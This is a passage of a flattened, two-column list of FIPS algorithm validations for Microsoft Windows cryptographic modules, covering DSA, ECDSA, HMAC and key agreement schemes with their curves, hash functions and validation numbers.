FIPS186-2: Windows Embedded Compact 7 Cryptographic Primitives
SIG(ver) MOD(1024); Library (bcrypt.dll) #645
SHS: Val# 1773
DRBG: Val# 193
List Val#645.
FIPS186-2: Windows Server 2008 R2 and SP1 CNG algorithms #391

SIG(ver) MOD(1024);
SHS: Val# 1081 Windows 7 Ultimate and SP1 CNG algorithms #386
DRBG: Val# 23
List Val#391. See Historical DSA List Val#386.
FIPS186-2: Windows Server 2008 R2 and SP1 Enhanced DSS

SIG(ver) MOD(1024); (DSSENH) #390
SHS: Val# 1081
RNG: Val# 649 Windows 7 Ultimate and SP1 Enhanced DSS (DSSENH)
Some of the previously validated components for this #385
FIPS186-2: Windows Server 2008 CNG algorithms #284

SIG(ver) MOD(1024);
SHS: Val# 753 Windows Vista Ultimate SP1 CNG algorithms #283
FIPS186-2: Windows Server 2008 Enhanced DSS (DSSENH) #282

SIG(ver) MOD(1024);
SHS: Val# 753 Windows Vista Ultimate SP1 Enhanced DSS (DSSENH)
RNG: Val# 435 #281
FIPS186-2: Windows Vista CNG algorithms #227

SIG(ver) MOD(1024);
SHS: Val# 618 Windows Vista Enhanced DSS (DSSENH) #226
RNG: Val# 321
FIPS186-2: Windows XP Professional SP3 Enhanced DSS and Diffie-

SIG(ver) MOD(1024); Hellman Cryptographic Provider (DSSENH) #292
SHS: Val# 784
RNG: Val# 448
List Val#292.
FIPS186-2: Windows XP Professional SP3 Enhanced Cryptographic
SIG(ver) MOD(1024); Provider (RSAENH) #291
SHS: Val# 783
RNG: Val# 447
List Val#291.
FIPS186-2: Windows 2003 SP2 Enhanced DSS and Diffie-Hellman

PQG(gen) MOD(1024); Cryptographic Provider #221
PQG(ver) MOD(1024);
KEYGEN(Y) MOD(1024);
SIG(gen) MOD(1024);
SIG(ver) MOD(1024);
SHS: Val# 611
RNG: Val# 314
FIPS186-2: Windows Server 2003 SP1 Enhanced DSS and Diffie-Hellman

PQG(gen) MOD(1024); Cryptographic Provider (DSSENH) #146
PQG(ver) MOD(1024);
SIG(gen) MOD(1024);
SIG(ver) MOD(1024);
SHS: Val# 385
FIPS186-2: Windows Server 2003 Enhanced DSS and Diffie-Hellman

PQG(ver) MOD(1024); Cryptographic Provider (DSSENH) #95
SIG(gen) MOD(1024);
SIG(ver) MOD(1024);
SHS: Val# 181
FIPS186-2: Windows 2000 DSSENH.DLL #29

PQG(gen) MOD(1024);
PQG(ver) MOD(1024); Windows 2000 DSSBASE.DLL #28
KEYGEN(Y) MOD(1024); Windows NT 4 SP6 DSSENH.DLL #26
SIG(gen) MOD(1024);
SHS: SHA-1 (BYTE) Windows NT 4 SP6 DSSBASE.DLL #25
SIG(ver) MOD(1024);
SHS: SHA-1 (BYTE)
FIPS186-2: PRIME; Windows NT 4.0 SP4 Microsoft Enhanced DSS and Diffie-
FIPS186-2: Hellman Cryptographic Provider #17
KEYGEN(Y):
SHS: SHA-1 (BYTE)
SIG(gen):
SIG(ver) MOD(1024);
SHS: SHA-1 (BYTE)
Elliptic Curve Digital Signature Algorithm (ECDSA)

ECDSA: Microsoft Windows 8.1, Microsoft Windows Server 2012
186-4: R2, Microsoft Windows Storage Server 2012 R2, Microsoft
Key Pair Generation: Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
Curves: P-256, P-384, P-521 Microsoft Surface Pro with Windows 8.1, Microsoft Surface
Generation Methods: Extra 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3,
Random Bits Microsoft Windows Phone 8.1, Microsoft Windows
Public Key Validation: Embedded 8.1 Industry and Microsoft StorSimple 8100
MsBignum Cryptographic Implementations #1263
Curves: P-256, P-384, P-521
Signature Generation: Version 6.3.9600
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
Signature Verification:
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
ECDSA: Microsoft Surface Hub Virtual TPM Implementations

186-4: #1253
Key Pair Generation:
Version 10.0.15063.674
Curves: P-256, P-384
Generation Methods: Testing
Candidates
ECDSA: Windows 10 Home, Pro, Enterprise, Education, Windows

Key Pair Generation: Server Datacenter (version 1709); Virtual TPM
Curves: P-256, P-384 Implementations #1252
Generation Methods: Testing Version 10.0.16299
Candidates
ECDSA: Microsoft Surface Hub MsBignum Cryptographic

Version 10.0.15063.674
Curves: P-256, P-384, P-521
Generation Methods: Extra
Random Bits
Public Key Validation:
Curves: P-256, P-384, P-521
Signature Generation:
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
ECDSA: Microsoft Surface Hub SymCrypt Cryptographic
Version 10.0.15063.674
Curves: P-256, P-384, P-521
Random Bits
Curves: P-256, P-384, P-521
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
ECDSA: Windows 10 Mobile (version 1709) SymCrypt

Version 10.0.15254
Curves: P-256, P-384, P-521
Random Bits
Curves: P-256, P-384, P-521
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
ECDSA: Windows 10 Mobile (version 1709) MsBignum

Version 10.0.15254
Curves: P-256, P-384, P-521
Random Bits
Curves: P-256, P-384, P-521
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
Key Pair Generation: Server Datacenter (version 1709); MsBignum
Curves: P-256, P-384, P-521 Cryptographic Implementations #1247
Generation Methods: Extra Version 10.0.16299
Random Bits
Curves: P-256, P-384, P-521
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512

Key Pair Generation: Server Datacenter (version 1709); SymCrypt
Curves: P-256, P-384, P-521 Cryptographic Implementations #1246
Generation Methods: Extra Version 10.0.16299
Random Bits
Curves: P-256, P-384, P-521
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
P-256 SHA: SHA-256
P-384 SHA: SHA-384
P-521 SHA: SHA-512
FIPS186-4: Windows 10 Creators Update (version 1703) Pro,

PKG: CURVES( P-256 P-384 TestingCandidates ) Enterprise, Education Virtual TPM Implementations #1136
SHS: Val#3790
DRBG: Val# 1555 Version 10.0.15063

PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) Enterprise, Education, Windows 10 S, Windows 10 Mobile
PKV: CURVES( P-256 P-384 P-521 ) MsBignum Cryptographic Implementations #1135
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521:
(SHA-512) Version 10.0.15063
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521:
(SHA-512) )
SHS: Val#3790
DRBG: Val# 1555
PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) Enterprise, Education, Windows 10 S, Windows 10 Mobile
PKV: CURVES( P-256 P-384 P-521 ) SymCrypt Cryptographic Implementations #1133
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521:
(SHA-512) Version 10.0.15063
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-521:
(SHA-512) )
SHS: Val#3790
DRBG: Val# 1555

PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) Library (bcrypt.dll) #1073
PKV: CURVES( P-256 P-384 P-521 )
SigGen: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) Version 7.00.2872
P-521: (SHA-1, 512) SIG(gen) with SHA-1 affirmed for use
with protocols only.
SigVer: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) P-
521: (SHA-1, 512) )
SHS:Val# 3649
DRBG:Val# 1430

PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) Library (bcrypt.dll) #1072
PKV: CURVES( P-256 P-384 P-521 )
SigGen: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) Version 8.00.6246
P-521: (SHA-1, 512) SIG(gen) with SHA-1 affirmed for use
SigVer: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 384) P-
521: (SHA-1, 512) )
SHS:Val#3648
DRBG:Val# 1429

PKG: CURVES( P-256 P-384 TestingCandidates ) Server 2016, Windows Storage Server 2016; Microsoft
PKV: CURVES( P-256 P-384 ) Surface Book, Surface Pro 4 and Surface Pro 3 w/ Windows
SigGen: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, 10 Anniversary Update Virtual TPM Implementations
256, 384) SIG(gen) with SHA-1 affirmed for use with #920
protocols only.
SigVer: CURVES( P-256: (SHA-1, 256) P-384: (SHA-1, Version 10.0.14393
256, 384) )
SHS: Val# 3347
DRBG: Val# 1222

PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) Server 2016, Windows Storage Server 2016; Microsoft
PKV: CURVES( P-256 P-384 P-521 ) Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- w/ Windows 10 Anniversary Update; Microsoft Lumia 950
521: (SHA-512) and Lumia 650 w/ Windows 10 Mobile Anniversary
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- Update MsBignum Cryptographic Implementations #911
521: (SHA-512) )
Version 10.0.14393
SHS: Val# 3347
DRBG: Val# 1217
PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- Surface Pro 2, and Surface Pro w/ Windows 10 November
521: (SHA-512) 2015 Update; Windows 10 Mobile for Microsoft Lumia
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- 950 and Microsoft Lumia 635; Windows 10 for Microsoft
521: (SHA-512) ) Surface Hub 84” and Surface Hub 55” MsBignum
SHS: Val# 3047
DRBG: Val# 955 Version 10.0.10586

PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) Windows 10, Microsoft Surface 3 with Windows 10,
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- Microsoft Surface Pro 2 with Windows 10, Microsoft
521: (SHA-512) Surface Pro with Windows 10 MsBignum Cryptographic
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- Implementations #706
521: (SHA-512) )
Version 10.0.10240
SHS: Val# 2886
DRBG: Val# 868

PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits ) R2, Microsoft Windows Storage Server 2012 R2, Microsoft
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
521: (SHA-512) Microsoft Surface Pro with Windows 8.1, Microsoft Surface
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P- 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3,
521: (SHA-512) ) Microsoft Windows Phone 8.1, Microsoft Windows
SHS: Val#2373 MsBignum Cryptographic Implementations #505
DRBG: Val# 489
Version 6.3.9600

PKG: CURVES( P-256 P-384 P-521 ) Windows RT, Surface Windows 8 Pro, and Windows Phone 8
SHS: #1903 Cryptography Next Generation (CNG) Implementations #341
DRBG: #258
SIG(ver):CURVES( P-256 P-384 P-521 )
SHS: #1903
DRBG: #258
FIPS186-4:
PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-
521: (SHA-512)
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-
521: (SHA-512) )
SHS: #1903
DRBG: #258
ECDSA List Val#341.
FIPS186-2: Windows Embedded Compact 7 Cryptographic Primitives
PKG: CURVES( P-256 P-384 P-521 ) Library (bcrypt.dll) #295
SHS: Val#1773
DRBG: Val# 193
SIG(ver): CURVES( P-256 P-384 P-521 )
SHS: Val#1773
DRBG: Val# 193
FIPS186-4:
PKG: CURVES( P-256 P-384 P-521 ExtraRandomBits )
SigGen: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-
521: (SHA-512)
SigVer: CURVES( P-256: (SHA-256) P-384: (SHA-384) P-
521: (SHA-512) )
SHS: Val#1773
DRBG: Val# 193
ECDSA List Val#295.

PKG: CURVES( P-256 P-384 P-521 )
SHS: Val#1081 Windows 7 Ultimate and SP1 CNG algorithms #141
DRBG: Val# 23
SHS: Val#1081
DRBG: Val# 23
ECDSA List Val#142. See Historical ECDSA List Val#141.

PKG: CURVES( P-256 P-384 P-521 )
SHS: Val#753 Windows Vista Ultimate SP1 CNG algorithms #82
SHS: Val#753
ECDSA List Val#83. See Historical ECDSA List Val#82.

PKG: CURVES( P-256 P-384 P-521 )
SHS: Val#618
RNG: Val# 321
SHS: Val#618
RNG: Val# 321
ECDSA List Val#60.
Keyed-Hash Message Authentication Code (HMAC)

HMAC-SHA-1: Microsoft Surface Hub Virtual TPM Implementations
Key Sizes < Block Size #3271
Key Sizes > Block Size
Version 10.0.15063.674
Key Sizes = Block Size
HMAC-SHA2-256:
Key Sizes < Block Size
HMAC-SHA2-384:
Prerequisite: SHS #4011
HMAC-SHA-1: Windows 10 Home, Pro, Enterprise, Education, Windows

Key Sizes < Block Size 10 S Fall Creators Update and Windows Server, Windows
Key Sizes > Block Size Server Datacenter (version 1709); Virtual TPM
Key Sizes = Block Size Implementations #3270
HMAC-SHA2-256: Version 10.0.16299
HMAC-SHA2-384:
HMAC-SHA-1: Microsoft Surface Hub SymCrypt Cryptographic

Key Sizes < Block Size Implementations #3269
Version 10.0.15063.674
HMAC-SHA2-256:
HMAC-SHA2-384:
HMAC-SHA2-512:
HMAC-SHA-1: Windows 10 Mobile (version 1709) SymCrypt
Key Sizes < Block Size Cryptographic Implementations #3268
Version 10.0.15254
HMAC-SHA2-256:
HMAC-SHA2-384:
HMAC-SHA2-512:
HMAC-SHA-1: Windows 10 Home, Pro, Enterprise, Education, Windows

Key Sizes < Block Size 10 S Fall Creators Update and Windows Server, Windows
Key Sizes > Block Size Server Datacenter (version 1709); SymCrypt
Key Sizes = Block Size Cryptographic Implementations #3267
HMAC-SHA2-256: Version 10.0.16299
HMAC-SHA2-384:
HMAC-SHA2-512:
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Windows 10 Creators Update (version 1703) Pro,
Val#3790 Enterprise, Education Virtual TPM Implementations #3062
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Version 10.0.15063
Val#3790
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS
Val#3790
HMAC-SHA1(Key Sizes Ranges Tested: KSBS ) SHS Windows 10 Creators Update (version 1703) Home, Pro,
Val#3790 Enterprise, Education, Windows 10 S, Windows 10 Mobile
Val#3790 Version 10.0.15063
Val#3790
Val#3790
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Windows Embedded Compact Enhanced Cryptographic
Val#3652 Provider (RSAENH) #2946
Val#3652
Val#3652
HMAC-SHA512 ( Key Size Ranges Tested: KSBS )
SHSVal#3652
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Windows Embedded Compact Enhanced Cryptographic
Val#3651 Provider (RSAENH) #2945
Val#3651
Val#3651
SHSVal#3651
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Windows Embedded Compact Cryptographic Primitives
Val# 3649 Library (bcrypt.dll) #2943
Val# 3649
Val# 3649
SHSVal# 3649
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Windows Embedded Compact Cryptographic Primitives
Val#3648 Library (bcrypt.dll) #2942
Val#3648
Val#3648
SHSVal#3648
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Microsoft Windows 10 Anniversary Update, Windows
SHS Val# 3347 Server 2016, Windows Storage Server 2016; Microsoft
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) 10 Anniversary Update Virtual TPM Implementations
SHS Val# 3347 #2661
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) Version 10.0.14393
SHS Val# 3347
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Val# Microsoft Windows 10 Anniversary Update, Windows
3347 Server 2016, Windows Storage Server 2016; Microsoft
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) SHS Val# w/ Windows 10 Anniversary Update; Microsoft Lumia 950
3347 and Lumia 650 w/ Windows 10 Mobile Anniversary
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) SHS Val# Update SymCrypt Cryptographic Implementations #2651
3347 Version 10.0.14393
HMAC-SHA512 ( Key Size Ranges Tested: KSBS ) SHS Val#
3347
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Microsoft Windows 10 November 2015 Update; Microsoft
SHS Val# 3047 Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) 2015 Update; Windows 10 Mobile for Microsoft Lumia
SHS Val# 3047 950 and Microsoft Lumia 635; Windows 10 for Microsoft
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) Surface Hub 84” and Surface Hub 55” SymCrypt
SHS Val# 3047 Cryptographic Implementations #2381
SHS Val# 3047
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Microsoft Windows 10, Microsoft Surface Pro 3 with
SHSVal# 2886 Windows 10, Microsoft Surface 3 with Windows 10,
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) Surface Pro with Windows 10 SymCrypt Cryptographic
SHSVal# 2886 Implementations #2233
SHSVal# 2886
SHSVal# 2886
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Storage Server 2012 R2, Microsoft Windows RT
SHS Val#2373 8.1, Microsoft Surface with Windows RT 8.1, Microsoft
Surface Pro with Windows 8.1, Microsoft Surface 2,
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft
SHS Val#2373 Windows Phone 8.1, Microsoft Windows Embedded 8.1
HMAC-SHA384 ( Key Size Ranges Tested: KSBS ) Industry and Microsoft StorSimple 8100 SymCrypt
SHS Val#2373 Cryptographic Implementations #1773
SHS Val#2373
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) SHS Windows CE and Windows Mobile, and Windows
Val#2764 Embedded Handheld Enhanced Cryptographic Provider
(RSAENH) #2122
Val#2764 Version 5.2.29344
Val#2764
Val#2764
HMAC-SHA1 (Key Sizes Ranges Tested: KS#1902 Windows 8, Windows RT, Windows Server 2012, Surface
HMAC-SHA256 ( Key Size Ranges Tested: KS#1902 BitLocker® Cryptographic Implementations #1347
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows 8, Windows RT, Windows Server 2012, Surface
SHS#1902 Windows RT, Surface Windows 8 Pro, and Windows Phone 8
Enhanced Cryptographic Provider (RSAENH) #1346
SHS#1902
SHS#1902
SHS#1902
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows 8, Windows RT, Windows Server 2012, Surface
SHS#1903 Next Generation Symmetric Cryptographic Algorithms
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) Implementations (SYMCRYPT) #1345
SHS#1903
SHS#1903
SHS#1903
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Embedded Compact 7 Cryptographic Primitives
SHSVal#1773 Library (bcrypt.dll) #1364
SHSVal#1773
Tinker HMAC-SHA384 ( Key Size Ranges Tested: KSBS
) SHSVal#1773
SHSVal#1773
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Embedded Compact 7 Enhanced Cryptographic
SHSVal#1774 Provider (RSAENH) #1227
SHSVal#1774
SHSVal#1774
SHSVal#1774
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Server 2008 R2 and SP1 CNG algorithms #686
SHSVal#1081
Windows 7 and SP1 CNG algorithms #677
SHSVal#1081 Windows Server 2008 R2 Enhanced Cryptographic
SHSVal#1081 Windows 7 Enhanced Cryptographic Provider (RSAENH)
#673
SHSVal#1081
HMAC-SHA1(Key Sizes Ranges Tested: KSVal#1081 Windows 7 and SP1 and Windows Server 2008 R2 and SP1
BitLocker Algorithm Implementations #675
HMAC-SHA256 ( Key Size Ranges Tested: KSVal#1081
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Server 2003 SP2 Enhanced Cryptographic Provider
SHSVal#816 (RSAENH) #452
SHSVal#816
SHSVal#816
SHSVal#816
HMAC-SHA1 (Key Sizes Ranges Tested: KSVal#753 Windows Vista Ultimate SP1 and Windows Server 2008
BitLocker Algorithm Implementations #415
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Server 2008 Enhanced Cryptographic Provider
HMAC-SHA256 ( Key Size Ranges Tested: KSBS ) Windows Vista Enhanced Cryptographic Provider
SHSVal#753
HMAC-SHA512 ( Key Size Ranges Tested: KSBS )SHS
Val#753
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS Windows Vista Enhanced Cryptographic Provider (RSAENH)
)SHSVal#618 #297
SHSVal#618
SHSVal#618
SHSVal#618
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows XP Professional SP3 Kernel Mode Cryptographic
SHSVal#785 Module (fips.sys) #429
Windows XP, vendor-affirmed
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows XP Professional SP3 Enhanced Cryptographic
SHSVal#783
SHSVal#783
SHSVal#783
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Server 2003 SP2 Enhanced Cryptographic Provider
SHSVal#613
SHSVal#613
SHSVal#613
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Server 2003 SP2 Kernel Mode Cryptographic
SHSVal#610 Module (fips.sys) #287
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Server 2008 CNG algorithms #413
SHSVal#753
Windows Vista Ultimate SP1 CNG algorithms #412
SHSVal#753
SHSVal#753
SHSVal#753
HMAC-SHA1 (Key Sizes Ranges Tested: KSVal#737 Windows Vista Ultimate BitLocker Drive Encryption #386
HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) Windows Vista CNG algorithms #298
SHSVal#618
SHSVal#618
SHSVal#618
SHSVal#618
HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile
SHSVal#589 Enhanced Cryptographic Provider (RSAENH) #267
HMAC-SHA256 ( Key Size Ranges Tested: KSBS
)SHSVal#589
SHSVal#589
SHSVal#589
HMAC-SHA1 ( Key Sizes Ranges Tested: KSBS ) Windows CE and Windows Mobile 6.0 and Windows Mobil 6.5
SHSVal#578 Enhanced Cryptographic Provider (RSAENH) #260
SHSVal#578
SHSVal#578
SHSVal#578
HMAC-SHA1 (Key Sizes Ranges Tested: KSVal#495 Windows Vista BitLocker Drive Encryption #199
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows Server 2003 SP1 Enhanced Cryptographic
Windows XP, vendor-affirmed
HMAC-SHA1 (Key Sizes Ranges Tested: KSBS ) Windows CE 5.00 and Windows CE 5.01 Enhanced
SHSVal#305 Cryptographic Provider (RSAENH) #31
SHSVal#305
SHSVal#305
SHSVal#305
Key Agreement Scheme (KAS)
KAS ECC: Microsoft Surface Hub Virtual TPM Implementations #150

Functions: Domain Parameter Generation,
Domain Parameter Validation, Full Public Key Version 10.0.15063.674
Validation, Key Pair Generation, Public Key
Regeneration
Schemes:
Full Unified:
Key Agreement Roles: Initiator,
Responder
KDFs: Concatenation
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
Prerequisite: SHS #4011, ECDSA #1253, DRBG #1734
KAS ECC: Windows 10 Home, Pro, Enterprise, Education, Windows
Functions: Domain Parameter Generation, 10 S Fall Creators Update and Windows Server, Windows
Domain Parameter Validation, Full Public Key Server Datacenter (version 1709); Virtual TPM
Validation, Key Pair Generation, Public Key Implementations #149
Regeneration
Version 10.0.16299
Schemes:
Full Unified:
Responder
KDFs: Concatenation
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
KAS ECC: Microsoft Surface Hub SymCrypt Cryptographic

Functions: Domain Parameter Generation, Implementations #148
Domain Parameter Validation, Key Pair
Generation, Partial Public Key Validation, Public Version 10.0.15063.674
Key Regeneration
Schemes:
Ephemeral Unified:
Responder
KDFs: Concatenation
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
One Pass DH:
Responder
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
Static Unified:
Responder
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
KAS FFC:
Generation, Partial Public Key Validation
Schemes:
dhEphem:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
dhOneFlow:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
dhStatic:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
Prerequisite: SHS #4011, DSA #1303, DRBG #1732
KAS ECC: Windows 10 Mobile (version 1709) SymCrypt

Functions: Domain Parameter Generation, Cryptographic Implementations #147
Generation, Partial Public Key Validation, Public Version 10.0.15254
Key Regeneration
Schemes:
Ephemeral Unified:
Responder
KDFs: Concatenation
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
One Pass DH:
Responder
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
Static Unified:
Responder
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
KAS FFC:
Schemes:
dhEphem:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
dhOneFlow:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
dhStatic:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
KAS ECC: Windows 10 Home, Pro, Enterprise, Education, Windows

Functions: Domain Parameter Generation, 10 S Fall Creators Update and Windows Server, Windows
Domain Parameter Validation, Key Pair Server Datacenter (version 1709); SymCrypt
Generation, Partial Public Key Validation, Public Cryptographic Implementations #146
Key Regeneration
Version 10.0.16299
Schemes:
Ephemeral Unified:
Responder
KDFs: Concatenation
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
One Pass DH:
Responder
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
Static Unified:
Responder
Parameter Sets:
EC:
Curve: P-256
SHA: SHA-256
MAC: HMAC
ED:
Curve: P-384
SHA: SHA-384
MAC: HMAC
EE:
Curve: P-521
SHA: SHA-512
MAC: HMAC
KAS FFC:
Schemes:
dhEphem:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
dhOneFlow:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
dhStatic:
Responder
Parameter Sets:
FB:
SHA: SHA-256
MAC: HMAC
FC:
SHA: SHA-256
MAC: HMAC
ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Windows 10 Creators Update (version 1703) Pro,
DPV KPG Full Validation Key Regeneration ) SCHEMES [ Enterprise, Education Virtual TPM Implementations #128
FullUnified ( EC: P-256 SHA256 HMAC ) ( ED: P-384
SHA384 HMAC ) ] Version 10.0.15063
SHS Val#3790
DSA Val#1135
DRBG Val#1556
FFC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG Windows 10 Creators Update (version 1703) Home, Pro,
DPV KPG Partial Validation ) SCHEMES [ dhEphem ( Enterprise, Education, Windows 10 S, Windows 10 Mobile
KARole(s): Initiator / Responder ) SymCrypt Cryptographic Implementations #127
( FB: SHA256 ) ( FC: SHA256 ) ]
[ dhOneFlow ( FB: SHA256 ) ( FC: SHA256 ) ] [ dhStatic ( Version 10.0.15063
No_KC < KARole(s): Initiator / Responder> ) ( FB:
SHA256 HMAC ) ( FC: SHA256 HMAC ) ]
SHS Val#3790
DSA Val#1223
DRBG Val#1555
ECC: (FUNCTIONS INCLUDED IN IMPLEMENTATION: DPG
DPV KPG Partial Validation ) SCHEMES [
EphemeralUnified ( No_KC < KARole(s): Initiator /
